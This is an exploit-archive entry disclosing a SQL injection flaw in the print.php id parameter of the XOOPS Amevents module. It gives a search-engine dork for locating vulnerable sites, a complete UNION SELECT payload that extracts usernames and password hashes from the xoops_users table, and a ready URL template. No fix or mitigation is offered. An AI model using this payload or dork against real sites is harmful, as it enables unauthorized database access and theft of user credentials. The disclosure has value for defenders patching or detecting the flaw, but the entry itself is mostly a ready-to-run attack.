XOOPS Module Amevents (print.php id) SQL Injection Vulnerability

2008-12-15 21:00:03

############################################ XOOPS Module: Amevents###############################################AUTHOR : netRoot####HOME : http://www.passw0rd.info#####MAİL : [email protected]############################################## DORKS : dork: /modules/amevents/print.php?id=########################################### target: scriptpage.com/modules/amevents/print.php?id=[sql d089] Sql code: -98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/* live link: http://xxx.com/modules/amevents/print.php?id=-98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.